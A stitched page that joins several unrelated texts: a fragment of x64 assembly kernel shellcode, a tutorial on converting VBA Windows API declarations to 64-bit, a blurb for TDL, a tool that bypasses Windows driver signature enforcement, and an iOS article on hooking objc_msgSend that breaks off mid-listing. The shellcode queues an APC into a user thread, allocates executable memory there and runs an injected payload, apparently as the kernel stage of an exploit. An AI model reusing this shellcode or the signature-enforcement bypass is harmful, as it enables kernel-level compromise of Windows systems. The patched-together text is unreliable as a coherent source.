    mov rbx, rsi    ; use rbx for iterating thread
%endif


    ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.
    ; Moreover, alertable thread need to be waiting state which is more difficult to check.
    ; try queueing APC then check KAPC member is more reliable.

_insert_queue_apc_loop:
    ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
    mov rbx, [rbx+8]
%ifndef COMPACT
    cmp rsi, rbx
    je _insert_queue_apc_loop   ; skip list head
%endif

    ; find start of ETHREAD address
    ; set it to rdx to be used for KeInitializeApc() argument too
    lea rdx, [rbx + r14]    ; ETHREAD
    
    ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.
    ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.
    ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.
    ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.
    ; Teb member is next to Queue member.
    mov edi, PSGETTHREADTEB_HASH
    call get_proc_addr
    mov eax, dword [rax+3]      ; get offset from code (offset of Teb is always > 0x7f)
    cmp qword [rdx+rax-8], 0    ; KTHREAD.Queue MUST not be NULL
    je _insert_queue_apc_loop
    
    ; KeInitializeApc(PKAPC,
    ;                 PKTHREAD,
    ;                 KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
    ;                 PKKERNEL_ROUTINE = kernel_apc_routine,
    ;                 PKRUNDOWN_ROUTINE = NULL,
    ;                 PKNORMAL_ROUTINE = userland_shellcode,
    ;                 KPROCESSOR_MODE = UserMode (1),
    ;                 PVOID Context);
    lea rcx, [rbp+DATA_KAPC_OFFSET]     ; PAKC
    xor r8, r8      ; OriginalApcEnvironment
    lea r9, [rel kernel_kapc_routine]    ; KernelApcRoutine
    push rbp    ; context
    push 1      ; UserMode
    push rbp    ; userland shellcode (MUST NOT be NULL)
    push r8     ; NULL
    sub rsp, 0x20   ; shadow stack
    mov edi, KEINITIALIZEAPC_HASH
    call win_api_direct
    ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later

    ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
    ;   SystemArgument1 is second argument in usermode code (rdx)
    ;   SystemArgument2 is third argument in usermode code (r8)
    lea rcx, [rbp+DATA_KAPC_OFFSET]
    ;xor edx, edx   ; no need to set it here
    ;xor r8, r8     ; no need to set it here
    xor r9, r9
    mov edi, KEINSERTQUEUEAPC_HASH
    call win_api_direct
    add rsp, 0x40
    ; if insertion failed, try next thread
    test eax, eax
    jz _insert_queue_apc_loop
    
    mov rax, [rbp+DATA_KAPC_OFFSET+0x10]     ; get KAPC.ApcListEntry
    ; EPROCESS pointer 8 bytes
    ; InProgressFlags 1 byte
    ; KernelApcPending 1 byte
    ; if success, UserApcPending MUST be 1
    cmp byte [rax+0x1a], 1
    je _insert_queue_apc_done
    
    ; manual remove list without lock
    mov [rax], rax
    mov [rax+8], rax
    jmp _insert_queue_apc_loop

_insert_queue_apc_done:
    ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.

_r3_to_r0_done:
    pop rax
    pop rbx
    pop rsi
    pop rdi
    pop r14
    pop r15
    ret

;========================================================================
; Call function in specific module
; 
; All function arguments are passed as calling normal function with extra register arguments
; Extra Arguments: r15 = module pointer
;                  edi = hash of target function name
;========================================================================
win_api_direct:
    call get_proc_addr
    jmp rax


;========================================================================
; Get function address in specific module
; 
; Arguments: r15 = module pointer
;            edi = hash of target function name
; Return: eax = offset
;========================================================================
get_proc_addr:
    ; Save registers
    push rbx
    push rcx
    push rsi                ; for using calc_hash

    ; use rax to find EAT
    mov eax, dword [r15+60]  ; Get PE header e_lfanew
    mov eax, dword [r15+rax+136] ; Get export tables RVA

    add rax, r15
    push rax                 ; save EAT

    mov ecx, dword [rax+24]  ; NumberOfFunctions
    mov ebx, dword [rax+32]  ; FunctionNames
    add rbx, r15

_get_proc_addr_get_next_func:
    ; When we reach the start of the EAT (we search backwards), we hang or crash
    dec ecx                     ; decrement NumberOfFunctions
    mov esi, dword [rbx+rcx*4]  ; Get rva of next module name
    add rsi, r15                ; Add the modules base address

    call calc_hash

    cmp eax, edi                        ; Compare the hashes
    jnz _get_proc_addr_get_next_func    ; try the next function

_get_proc_addr_finish:
    pop rax                     ; restore EAT
    mov ebx, dword [rax+36]
    add rbx, r15                ; ordinate table virtual address
    mov cx, word [rbx+rcx*2]    ; desired functions ordinal
    mov ebx, dword [rax+28]     ; Get the function addresses table rva
    add rbx, r15                ; Add the modules base address
    mov eax, dword [rbx+rcx*4]  ; Get the desired functions RVA
    add rax, r15                ; Add the modules base address to get the functions actual VA

    pop rsi
    pop rcx
    pop rbx
    ret

;========================================================================
; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
; 
; Argument: rsi = string to hash
; Clobber: rsi
; Return: eax = hash
;========================================================================
calc_hash:
    push rdx
    xor eax, eax
    cdq
_calc_hash_loop:
    lodsb                   ; Read in the next byte of the ASCII string
    ror edx, 13             ; Rotate right our hash value
    add edx, eax            ; Add the next byte of the string
    test eax, eax           ; Stop when found NULL
    jne _calc_hash_loop
    xchg edx, eax
    pop rdx
    ret


; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
; Moreover, there is no lock when calling KernelApcRoutine.
; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.
;
; VOID KernelApcRoutine(
;           IN PKAPC Apc,
;           IN PKNORMAL_ROUTINE *NormalRoutine,
;           IN PVOID *NormalContext,
;           IN PVOID *SystemArgument1,
;           IN PVOID *SystemArgument2)
kernel_kapc_routine:
    push rbp
    push rbx
    push rdi
    push rsi
    push r15
    
    mov rbp, [r8]       ; *NormalContext is our data area pointer
        
    mov r15, [rbp+DATA_NT_KERNEL_ADDR_OFFSET]
    push rdx
    pop rsi     ; mov rsi, rdx
    mov rbx, r9
    
    ;======================================
    ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
    ;======================================
    xor eax, eax
    mov cr8, rax    ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
    ; rdx is already address of baseAddr
    mov [rdx], rax      ; baseAddr = 0
    mov ecx, eax
    not rcx             ; ProcessHandle = -1
    mov r8, rax         ; ZeroBits
    mov al, 0x40    ; eax = 0x40
    push rax            ; PAGE_EXECUTE_READWRITE = 0x40
    shl eax, 6      ; eax = 0x40 << 6 = 0x1000
    push rax            ; MEM_COMMIT = 0x1000
    ; reuse r9 for address of RegionSize
    mov [r9], rax       ; RegionSize = 0x1000
    sub rsp, 0x20   ; shadow stack
    mov edi, ZWALLOCATEVIRTUALMEMORY_HASH
    call win_api_direct
    add rsp, 0x30
%ifndef COMPACT
    ; check error
    test eax, eax
    jnz _kernel_kapc_routine_exit
%endif
    
    ;======================================
    ; copy userland payload
    ;======================================
    mov rdi, [rsi]
    lea rsi, [rel userland_start]
    mov ecx, 0x600  ; fix payload size to 1536 bytes
    rep movsb
    
    ;======================================
    ; find CreateThread address (in kernel32.dll)
    ;======================================
    mov rax, [rbp+DATA_PEB_ADDR_OFFSET]
    mov rax, [rax + 0x18]       ; PEB->Ldr
    mov rax, [rax + 0x20]       ; InMemoryOrder list

%ifdef COMPACT
    mov rsi, [rax]      ; first one always be executable, skip it
    lodsq               ; skip ntdll.dll
%else
_find_kernel32_dll_loop:
    mov rax, [rax]       ; first one always be executable
    ; offset 0x38 (WORD)  => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
    ; offset 0x48 (WORD)  => must be 0x18 (name len kernel32.dll)
    ; offset 0x50  => is name
    ; offset 0x20  => is dllbase
    ;cmp word [rax+0x38], 0x40
    ;jne _find_kernel32_dll_loop
    cmp word [rax+0x48], 0x18
    jne _find_kernel32_dll_loop
    
    mov rdx, [rax+0x50]
    ; check only "32" because name might be lowercase or uppercase
    cmp dword [rdx+0xc], 0x00320033   ; 3\x002\x00
    jnz _find_kernel32_dll_loop
%endif

    mov r15, [rax+0x20]
    mov edi, CREATETHREAD_HASH
    call get_proc_addr

    ; save CreateThread address to SystemArgument1
    mov [rbx], rax
    
_kernel_kapc_routine_exit:
    xor ecx, ecx
    ; clear queueing kapc flag, allow other hijacked system call to run shellcode
    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], cl
    ; restore IRQL to APC_LEVEL
    mov cl, 1
    mov cr8, rcx
    
    pop r15
    pop rsi
    pop rdi
    pop rbx
    pop rbp
    ret

  
userland_start:
userland_start_thread:
    ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
    xchg rdx, rax   ; rdx is CreateThread address passed from kernel
    xor ecx, ecx    ; lpThreadAttributes = NULL
    push rcx        ; lpThreadId = NULL
    push rcx        ; dwCreationFlags = 0
    mov r9, rcx     ; lpParameter = NULL
    lea r8, [rel userland_payload]  ; lpStartAddr
    mov edx, ecx    ; dwStackSize = 0
    sub rsp, 0x20
    call rax
    add rsp, 0x30
    ret
    
userland_payload:

How to convert Windows API declarations in VBA for 64-bit

Compile error message for legacy API declaration

Since Office 2010 all the Office applications including Microsoft Access and VBA are available as a 64-bit edition in addition to the classic 32-bit edition.

To clear up an occasional misconception. You do not need to install Office/Access as 64-bit application just because you got a 64-bit operating system. Windows x64 provides an excellent 32-bit subsystem that allows you to run any 32-bit application without drawbacks.

For now, 64-bit Office/Access still is rather the exception than the norm, but this is changing more and more.

Access — 32-bit vs. 64-bit

If you are just focusing on Microsoft Access there is actually no compelling reason to use the 64-bit edition instead of the 32-bit edition. Rather the opposite is true. There are several reasons not to use 64Bit Access.

  • Many ActiveX-Controls that are frequently used in Access development are still not available for 64-bit. Yes, this is still a problem in 2017, more than 10 years after the first 64Bit Windows operating system was released.
  • Drivers/Connectors for external systems like ODBC-Databases and special hardware might not be available. – Though this should rarely be an issue nowadays. Only if you need to connect to some old legacy systems this might still be a factor.
  • And finally, Access applications using the Windows API in their VBA code will require some migration work to function properly in an x64-environment.

There is only one benefit of 64-bit Access I’m aware of. When you open multiple forms at the same time that contain a large number of sub-forms, most likely on a tab control, you might run into out-of-memory-errors on 32-bit systems. The basic problem exists with 64-bit Access as well, but it takes much longer until you will see any memory related error.

Unfortunately (in this regard) Access is part of the Office Suite as is Microsoft Excel. For Excel, there actually are use cases for the 64-Bit edition. If you use Excel to calculate large data models, e.g. financial risk calculations, you will probably benefit from the additional memory available to a 64-bit application.

So, whether you as an Access developer like it or not, you might be confronted with the 64-bit edition of Microsoft Access because someone in your or your client’s organization decided they will install the whole Office Suite in 64-bit. – It is not possible to mix and match 32- and 64-bit applications from the Microsoft Office suite.

I can’t do anything about the availability of third-party-components, so in this article, I’m going to focus on the migration of Win-API calls in VBA to 64-bit compatibility.

Migrate Windows API-Calls in VBA to 64-bit

Fortunately, the Windows API was completely ported to 64-bit. You will not encounter any function, which was available on 32-bit but isn’t anymore on 64-bit. – At least I do not know of any.

However, I frequently encounter several common misconceptions about how to migrate your Windows API calls. I hope I will be able to debunk them with this text.

But first things first. The very first thing you will encounter when you try to compile an Access application with an API declaration that was written for 32-bit in VBA in 64-bit Access is an error message.

Compile error: The code in this project must be updated for use on 64-bit systems. Please review and update Declare statements and then mark them with the PtrSafe attribute.

This message is pretty clear about the problem, but you need further information to implement the solution.

With the introduction of Access 2010, Microsoft published an article on 32- and 64-Compatibility in Access. In my opinion, that article was comprehensive and pretty good, but many developers had the opinion it was insufficient.

Just recently there was a new, and in my opinion excellent, introduction to the 64-bit extensions in VBA7 published on MSDN. It actually contains all the information you need. Nevertheless, it makes sense to elaborate on how to apply it to your project.

The PtrSafe keyword

With VBA7 (Office 2010) the new PtrSafe keyword was added to the VBA language. This new keyword can (should) be used in DeclareStatements for calls to external DLL-Libraries, like the Windows API.

What does PtrSafe do? It actually does … nothing. Correct, it has no effect on how the code works at all.

The only purpose of the PtrSafe attribute is that you, as the developer, explicitly confirm to the VBA runtime environment that you checked your code to handle any pointers in the declared external function call correctly.

As the data type for pointers is different in a 64-bit environment (more on that in a moment) this actually makes sense. If you would just run your 32-bit API code in a 64-bit context, it would work; sometimes. Sometimes it would just not work. And sometimes it would overwrite and corrupt random areas of your computer’s memory and cause all sorts of random application instability and crashes. These effects would be very hard to track down to the incorrect API-Declarations.

For this understandable reason, the PtrSafe keyword is mandatory in 64-bit VBA for each external function declaration with the DeclareStatement. The PtrSafe keyword can be used in 32-bit VBA as well but is optional there for downward compatibility.

Public Declare PtrSafe Sub Sleep Lib «kernel32» (ByVal dwMilliseconds As Long)

The LongLong type

The data types Integer (16-bit Integer) and Long (32-bit Integer) are unchanged in 64-bit VBA. They are still 2 bytes and 4 bytes in size and their range of possible values is the same as it were before on 32-bit. This is not only true for VBA but for the whole Windows 64-bit platform. Generic data types retain their original size.

Now, if you want to use a true 64-bit Integer in VBA, you have to use the new LongLong data type. This data type is actually only available in 64-bit VBA, not in the 32-bit version. In context with the Windows API, you will actually use this data type only very, very rarely. There is a much better alternative.

The LongPtr data type

On 32-bit Windows, all pointers to memory addresses are 32-bit Integers. In VBA, we used to declare those pointer variables as Long. On 64-bit Windows, these pointers were changed to 64-bit Integers to address the larger memory space. So, obviously, we cannot use the unchanged Long data type anymore.

In theory, you could use the new LongLong type to declare integer pointer variables in 64-bit VBA code. In practice, you absolutely should not. There is a much better alternative.

Particularly for pointers, Microsoft introduced an all new and very clever data type. The LongPtr data type. The really clever thing about the LongPtr type is, it is a 32-bit Integer if the code runs in 32-bit VBA and it becomes a 64-bit Integer if the code runs in 64-bit VBA.

LongPtr is the perfect type for any pointer or handle in your Declare Statement. You can use this data type in both environments and it will always be appropriately sized to handle the pointer size of your environment.

Misconception: “You should change all Long variables in your Declare Statements and Type declarations to be LongPtr variables when adapting your code for 64-bit.”

Wrong!

As mentioned above, the size of the existing, generic 32-bit data types has not changed. If an API-Function expected a Long Integer on 32-bit it will still expect a Long Integer on 64-bit.

Only if a function parameter or return value is representing a pointer to a memory location or a handle (e.g. Window Handle (HWND) or Picture Handle), it will be a 64-bit Integer. Only these types of function parameters should be declared as LongPtr.

If you use LongPtr incorrectly for parameters that should be plain Long Integer your API calls may not work or may have unexpected side effects. Particularly if you use LongPtr incorrectly in Type declarations. This will disrupt the sequential structure of the type and the API call will raise a type mismatch exception.

Public Declare PtrSafe Function ShowWindow Lib «user32» (ByVal hWnd As LongPtr, ByVal nCmdShow As Long) As Boolean

The hWnd argument is a handle of a window, so it needs to be a LongPtr. nCmdShow is an int32, it should be declared as Long in 32-bit and in 64-bit as well.

Do not forget a very important detail. Not only your Declare Statement should be written with the LongPtr data type, your procedures calling the external API function must, in fact, use the LongPtr type as well for all variables, which are passed to such a function argument.

VBA7 vs WIN64 compiler constants

Also new with VBA7 are the two new compiler constants Win64 and VBA7VBA7 is true if your code runs in the VBA7-Environment (Access/Office 2010 and above). Win64 is true if your code actually runs in the 64-bit VBA environment. Win64 is not true if you run a 32-Bit VBA Application on a 64-bit system.

Misconception: “You should use the WIN64 compiler constants to provide two versions of your code if you want to maintain compatibility with 32-bit VBA/Access.”

Wrong!

For 99% of all API declarations, it is completely irrelevant if your code runs in 32-bit VBA or in 64-bit VBA.

As explained above, the PtrSafe Keyword is available in 32-bit VBA as well. And, more importantly, the LongPtr data type is too. So, you can and should write API code that runs in both environments. If you do so, you’ll probably never need to use conditional compilation to support both platforms with your code.

However, there might be another problem. If you only target Access (Office) 2010 and newer, my above statement is unconditionally correct. But if your code should run with older version of Access as well, you need to use conditional compilation indeed. But you still do not need to care about 32/64-Bit. You need to care about the Access/VBA-Version you code is running in.

You can use the VBA7 compiler constant to write code for different versions of VBA. Here is an example for that.

Private Const SW_MAXIMIZE As Long = 3 #If VBA7 Then Private Declare PtrSafe Function ShowWindow Lib «USER32» _ (ByVal hwnd As LongPtr, ByVal nCmdShow As Long) As Boolean Private Declare PtrSafe Function FindWindow Lib «USER32» Alias «FindWindowA» _ (ByVal lpClassName As String, ByVal lpWindowName As String) As LongPtr #Else Private Declare Function ShowWindow Lib «USER32» _ (ByVal hwnd As Long, ByVal nCmdShow As Long) As Boolean Private Declare Function FindWindow Lib «USER32» Alias «FindWindowA» _ (ByVal lpClassName As String, ByVal lpWindowName As String) As Long #End If Public Sub MaximizeWindow(ByVal WindowTitle As String) #If VBA7 Then Dim hwnd As LongPtr #Else Dim hwnd As Long #End If hwnd = FindWindow(vbNullString, WindowTitle) If hwnd <> 0 Then Call ShowWindow(hwnd, SW_MAXIMIZE) End If End Sub

Now, here is a screenshot of that code in the 64-bit VBA-Editor. Notice the red highlighting of the legacy declaration. This code section is marked, but it does not produce any actual error. Due to the conditional compilation, it will never be compiled in this environment.

Syntax error higlighting in x64

When to use the WIN64 compiler constant?

There are situations where you still want to check for Win64. There are some new API functions available on the x64 platform that simply do not exist on the 32-bit platform. So, you might want to use a new API function on x64 and a different implementation on x86 (32-bit).

A good example for this is the GetTickCount function. This function returns the number of milliseconds since the system was started. Its return value is a Long. The function can only return the tick count for 49.7 days before the maximum value of Long is reached. To improve this, there is a newer GetTickCount64 function. This function returns an ULongLong, a 64-bit unsigned integer. The function is available on 32-bit Windows as well, but we cannot use it there because we have no suitable data type in VBA to handle its return value.

If you want to use this the 64bit version of the function when your code is running in a 64-bit environment, you need to use the Win64constant.

#If Win64 Then Public Declare PtrSafe Function GetTickCount Lib «Kernel32» Alias «GetTickCount64» () As LongPtr #Else Public Declare PtrSafe Function GetTickCount Lib «Kernel32» () As LongPtr #End If

In this sample, I reduced the platform dependent code to a minimum by declaring both versions of the function as GetTickCount. Only on 64-bit, I use the alias GetTickCount64 to map this to the new version of this function. The “correct” return value declaration would have been LongLong for the 64-bit version and just Long for the 32-bit version. I use LongPtr as return value type for both declarations to avoid platform dependencies in the calling code.

A common pitfall — The size of user-defined types

There is a common pitfall that, to my surprise, is hardly ever mentioned.

Many API-Functions that need a user-defined type passed as one of their arguments expect to be informed about the size of that type. This usually happens either by the size being stored in a member inside the structure or passed as a separate argument to the function.

Frequently developers use the Len-Function to determine the size of the type. That is incorrect, but it works on the 32-bit platform — by pure chance. Unfortunately, it frequently fails on the 64-bit platform.

To understand the issue, you need to know two things about Window’s inner workings.

  1. The members of user-defined types are aligned sequentially in memory. One member after the other.
  2. Windows manages its memory in small chunks. On a 32-bit system, these chunks are always 4 bytes big. On a 64-bit system, these chunks have a size of 8 bytes.

If several members of a user-defined type fit into such a chunk completely, they will be stored in just one of those. If a part of such a chunk is already filled and the next member in the structure will not fit in the remaining space, it will be put in the next chunk and the remaining space in the previous chunk will stay unused. This process is called padding.

Regarding the size of user-defined types, the Windows API expects to be told the complete size the type occupies in memory. Including those padded areas that are empty but need to be considered to manage the total memory area and to determine the exact positions of each of the members of the type.

The Len-Function adds up the size of all the members in a type, but it does not count the empty memory areas, which might have been created by the padding. So, the size computed by the Len-Function is not correct! — You need to use the LenB-Function to determine the total size of the type in memory.

Here is a small sample to illustrate the issue:

Public Type smallType a As Integer b As Long x As LongPtr End Type Public Sub testTypeSize() Dim s As smallType Debug.Print «Len: « & Len(s) Debug.Print «LenB: « & LenB(s) End Sub

On 32-bit the Integer is two bytes in size but it will occupy 4 bytes in memory because the Long is put in the next chunk of memory. The remaining two bytes in the first chunk of memory are not used. The size of the members adds up to 10 bytes, but the whole type is 12 bytes in memory.

On 64-bit the Integer and the Long are 6 bytes total and will fit into the first chunk together. The LongPtr (now 8 bytes in size) will be put into the net chunk of memory and once again the remaining two bytes in the first chunk of memory are not used. The size of the members adds up to 14 bytes, but the whole type is 16 bytes in memory.

So, if the underlying mechanism exists on both platforms, why is this not a problem with API calls on 32-bit? — Simply by pure chance. To my knowledge, there is no Windows API function that explicitly uses a datatype smaller than a DWORD (Long) as a member in any of its UDT arguments.

Wrap up

With the content covered in this article, you should be able to adapt most of your API-Declarations to 64-bit.

Many samples and articles on this topic available on the net today are lacking sufficient explanation to highlight the really important issues. I hope I was able to show the key facts for a successful migration.

Always keep in mind, it is actually not that difficult to write API code that is ready for 64-bit. — Good luck!

A Tool To Bypass Windows x64 Driver Signature Enforcement

TDL (Turla Driver Loader) For Bypassing Windows x64 Signature Enforcement

Definition: TDL Driver loader allows bypassing Windows x64 Driver Signature Enforcement.

What are the system requirements and limitations?

It can run on OS x64 Windows 7/8/8.1/10.
As Vista is obsolete so, TDL doesn’t support Vista it only designed for x64 Windows.
Privilege of administrator is required.
Loaded drivers MUST BE specially designed to run as «driverless».
There is No SEH support.
There is also No driver unloading.
Automatically Only ntoskrnl import resolved, else everything is up to you.
It also provides Dummy driver examples.


Differentiate DSEFix and TDL:

As both DSEFix and TDL uses advantages of driver exploit but they have entirely different way of using it.

Benefits of DSEFix: 

It manipulates kernel variable called g_CiEnabled (Vista/7, ntoskrnl.exe) and/or g_CiOptions (8+. CI.DLL).
DSEFix is simple- you need only to turn DSE it off — load your driver nothing else required.
DSEFix is a potential BSOD-generator as it id subject to PatchGuard (KPP) protection.

Advantages of TDL:

It is friendly to PatchGuard as it doesn’t patch any kernel variables.
Shellcode which TDL used can be able to map driver to kernel mode without windows loader.
Non-invasive bypass od DSE is the main advantage of TDL.

There are some disadvantages too:

To run as «driverless» Your driver must be specially created.
Driver should exist in kernel mode as executable code buffer
You can load multiple drivers, if they are not conflicting each other.

Build

TDL contains full source code. You need Microsoft Visual Studio 2015 U1 and later versions if you want to build it. And same as for driver builds there should be Microsoft Windows Driver Kit 8.1.

Download Link: Click Here

Tracing Objective-C method calls

Linux has this great tool called strace, on OSX there’s a tool called dtruss — based on dtrace. Dtruss is great in functionality, it gives pretty much everything you need. It is just not as nice to use as strace. However, on Linux there is also ltrace for library tracing. That is arguably more useful because you can see much more granular application activity. Unfortunately, there isn’t such a tool on OSX. So, I decided to make one — albeit a simpler version for now. I called it objc_trace.

Objc_trace’s functionality is quite limited at the moment. It will print out the name of the method, the class and a list of parameters to the method. In the future it will be expanded to do more things, however just knowing which method was called is enough for many debugging purposes.

Something about the language

Without going into too much detail let’s look into the relevant parts of the Objective-Cruntime. This subject has been covered pretty well by the hacker community. In Phrack there is a great article covering various internals of the language. However, I will scratch the surface to review some aspects that are useful for this context.

The language is incredibly dynamic. While still backwards compatible to C (or C++), most of the code is written using classes and methods a.k.a. structures and function pointers. A class is exactly what you’re thinking of. It can have static or instance methods or fields. For example, you might have a class Book with a method Pages that returns the contents. You might call it this way:

	Book* book = [[Book alloc] init];
	Page* pages = [book Pages];

The alloc function is a static method while the others (init and Pages) are dynamic. What actually happens is that the system sends messages to the object or the static class. The message contains the class name, the instance, the method name and any parameters. The runtime will resolve which compiled function actually implements this method and call that.

If anything above doesn’t make sense you might want to read the referenced Phrack article for more details.

Message passing is great, though there are all kinds of efficiency considerations in play. For example, methods that you call will eventually get cached so that the resolution process occurs much faster. What’s important to note is that there is some smoke and mirrors going on.

The system is actually not sending messages under the hood. What it is doing is routing the execution using a single library call: objc_msgSend [1]. This is due to how the concept of a message is implemented under the hood.

	id objc_msgSend(id self, SEL op, ...)

Let’s take ourselves out of the Objective-C abstractions for a while and think about how things are implemented in C. When a method is called the stack and the registers are configured for the objc_msgSend call. id type is kind of like a void * but restricted to Objective-C class instances. SEL type is actually char* type and refers to selectors, more specifically the methods names (which include parameters). For example, a method that takes two parameters will have a selector that might look something like this: createGroup:withCapacity:. Colons signal that there should be a parameter there. Really quite confusing but we won’t dwell on that.

The useful part is that a selector is a C-String that contains the method name and its named parameters. A non-obfuscating compiler does not remove them because the names are needed to resolve the implementing function.

Shockingly, the function that implements the method takes in two extra parameters ahead of the user defined parameters. Those are the self and the op. If you look at the disassembly, it looks something like this (taken from Damn Vulnerable iOS App):

__text:100005144
__text:100005144 ; YapDatabaseViewState - (id)createGroup:(id) withCapacity:(uint64_t)
__text:100005144 ; Attributes: bp-based frame
__text:100005144
__text:100005144 ; id __cdecl -[YapDatabaseViewState createGroup:withCapacity:]
                        ;         (struct YapDatabaseViewState *self, SEL, id, uint64_t)
__text:100005144 __YapDatabaseViewState_createGroup_withCapacity__

Notice that the C function is called __YapDatabaseViewState_createGroup_withCapacity__, the method is called createGroup and the class is YapDatabaseViewState. It takes two parameters: an idand a uint64_t. However, it also takes a struct YapDatabaseViewState *self and a SEL. This signature essentially matches the signature of objc_msgSend, except that the latter has variadic parameters.

The existence and the location of the extra parameters is not accidental. The reason for this is that objc_msgSend will actually redirect execution to the implementing function by looking up the selector to function mapping within the class object. Once it finds the target it simply jumps there without having to readjust the parameter registers. This is why I referred to this as a routing mechanism, rather than message passing. Of course, I say that due to the implementation details, rather than the conceptual basis for what is happening here.

Quite smart actually, because this allows the language to be very dynamic in nature i.e. I can remap SEL to Function mapping and change the implementation of any particular method. This is also great for reverse engineering because this system retains a lot of the labeling information that the developer puts into the source code. I quite like that.

The plan

Now that we’ve seen how Objective-C makes method calls, we notice that objc_msgSend becomes a choke point for all method calls. It is like a hub in a poorly setup network with many many users. So, in order to get a list of every method called all we have to do is watch this function. One way to do this is via a debugger such as LLDB or GDB. However, the trouble is that a debugger is fairly heavy and mostly interactive. It’s not really good when you want to capture a run or watch the process to pin point a bug. Also, the performance hit might be too much. For more offensive work, you can’t embed one of those debuggers into a lite weight implant.

So, what we are going to do is hook the objc_msgSend function on an ARM64 iOS Objective-C program. This will allow us to specify a function to get called before objc_msgSend is actually executed. We will do this on a Jailbroken iPhone — so no security mechanism bypasses here, the Jailbreak takes care of all of that.

Figure 1: Patching at high level

On the high level the hooking works something like this. objc_msgSend instructions are modified in the preamble to jump to another function. This other function will perform our custom tracing features, restore the CPU state and return to a jump table. The jump table is a dynamically generated piece of code that will execute the preamble instructions that we’ve overwritten and jump back to objc_msgSend to continue with normal execution.

Hooking

The implementation of the technique presented can be found in the objc_tracerepository.

The first thing we are going to do is allocate what I call a jump page. It is called so because this memory will be a page of code that jumps back to continue executing the original function.

s_jump_page* t_func = 
   (s_jump_page*)mmap(NULL, 4096, 
    		PROT_READ | PROT_WRITE, 
    		MAP_ANON  | MAP_PRIVATE, -1, 0);

Notice that the type of the jump page is s_jump_page which is a structure that will represent our soon to be generated code.

typedef struct {
    instruction_t     inst[4];    
    s_jump_patch jump_patch[5];
    instruction_t     backup[4];    
} s_jump_page;

The s_jump_page structure contains four instructions that we overwrite (think back to the diagram at step 2). We also keep a backup of these instruction at the end of the structure — not strictly necessary but it makes for easier unhooking. Then there are five structures called jump patches. These are special sets of instructions that will redirect the CPU to an arbitrary location in memory. Jump patches are also represented by a structure.

typedef struct {
    instruction_t i1_ldr;
    instruction_t i2_br;
    address_t jmp_addr;
} s_jump_patch;

Using these structures we can build a very elegant and transparent mechanism for building dynamic code. All we have to do is create an inline assembly function in C and cast it to the structure.

__attribute__((naked))
void d_jump_patch() {
    __asm__ __volatile__(
        // trampoline to somewhere else.
        "ldr x16, #8;\n"
        "br x16;\n"
        ".long 0;\n" // place for jump address
        ".long 0;\n"
    );
}

This is ARM64 Assembly to load a 64-bit value from address PC+8 then jump to it. The .long placeholders are places for the target address.

s_jump_patch* jump_patch(){
    return (s_jump_patch*)d_jump_patch;
}

In order to use this we simply cast the code i.e. the d_jump_patch function pointer to the structure and set the value of the jmp_addr field. This is how we implement the function that generates the custom trampoline.

void write_jmp_patch(void* buffer, void* dst) {
    // returns the pointer to d_jump_patch.
    s_jump_patch patch = *(jump_patch());

    patch.jmp_addr = (address_t)dst;

    *(s_jump_patch*)buffer = patch;
}

We take advantage of the C compiler automatically copying the entire size of the structure instead of using memcpy. In order to patch the original objc_msgSend function we use write_jmp_patch function and point it to the hook function. Of course, before we can do that we copy the original instructions to the jump page for later execution and back up.

    //   Building the Trampoline
    *t_func = *(jump_page());
    
    // save first 4 32bit instructions
    //   original -> trampoline
    instruction_t* orig_preamble = (instruction_t*)o_func;
    for(int i = 0; i < 4; i++) {
        t_func->inst  [i] = orig_preamble[i];
        t_func->backup[i] = orig_preamble[i];
    }

Now that we have saved the original instructions from objc_msgSend we have to be aware that we’ve copied four instructions. A lot can happen in four instructions, all sorts of decisions and branches. In particular I’m worried about branches because they can be relative. So, what we need to do is validate that t_func->inst doesn’t have any branches. If it does, they will need to modified to preserve functionality.

This is why s_jump_page has five jump patches:

  1. All four instructions are non branches, so the first jump patch will automatically redirect execution to objc_msgSend+16 (skipping the patch).
  2. There are up to four branch instructions, so each of the jump patches will be used to redirect to the appropriate offset into objc_msgSend.

Checking for branch instructions is a bit tricky. ARM64 is a RISC architecture and does not present the same variety of instructions as, say, x86-64. But, there are still quite a few [2].

  1. Conditional Branches:
    • B.cond label jumps to PC relative offset.
    • CBNZ Wn|Xn, label jumps to PC relative offset if Wn is not equal to zero.
    • CBZ Wn|Xn, label jumps to PC relative offset if Wn is equal to zero.
    • TBNZ Xn|Wn, #uimm6, label jumps to PC relative offset if bit number uimm6 in register Xn is not zero.
    • TBZ Xn|Wn, #uimm6, label jumps to PC relative offset if bit number uimm6 in register Xn is zero.
  2. Unconditional Branches:
    • B label jumps to PC relative offset.
    • BL label jumps to PC relative offset, writing the address of the next sequential instruction to register X30. Typically used for making function calls.
  3. Unconditional Branches to register:
    • BLR Xm unconditionally jumps to address in Xm, writing the address of the next sequential instruction to register X30.
    • BR Xm jumps to address in Xm.
    • RET {Xm} jumps to register Xm.

We don’t particular care about category three because, register states should not influenced by our hooking mechanism. However, category one and two are PC relative and therefore need to be updated if found in the preamble.

So, I wrote a function that updates the instructions. At the moment it only handles a subset of cases, specifically the B.cond and B instructions. The former is found in objc_msgSend.

__text:18DBB41C0  EXPORT _objc_msgSend
__text:18DBB41C0   _objc_msgSend 
__text:18DBB41C0     CMP             X0, #0
__text:18DBB41C4     B.LE            loc_18DBB4230
__text:18DBB41C8   loc_18DBB41C8
